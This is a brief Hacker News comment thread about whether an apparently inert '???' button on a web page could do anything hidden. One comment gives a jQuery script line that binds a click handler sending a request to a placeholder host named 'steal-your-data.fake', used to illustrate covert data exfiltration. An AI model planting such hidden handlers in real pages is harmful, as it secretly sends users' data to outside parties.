Hacker News new | ask | show | jobs
by emilfihlman 2967 days ago
What does the ??? button do?
1 comments

Nothing. Here's its code:

  <span class="fake-button" style="padding: 0px 6px;">???</span>
That mean nothing. You could still do:

<script>$('.fake-button').on('click', function(){$.ajax({url: 'http://www.steal-your-data.fake'})})</script>

The inspector displays the listeners of the elements.
Sure about that? ;)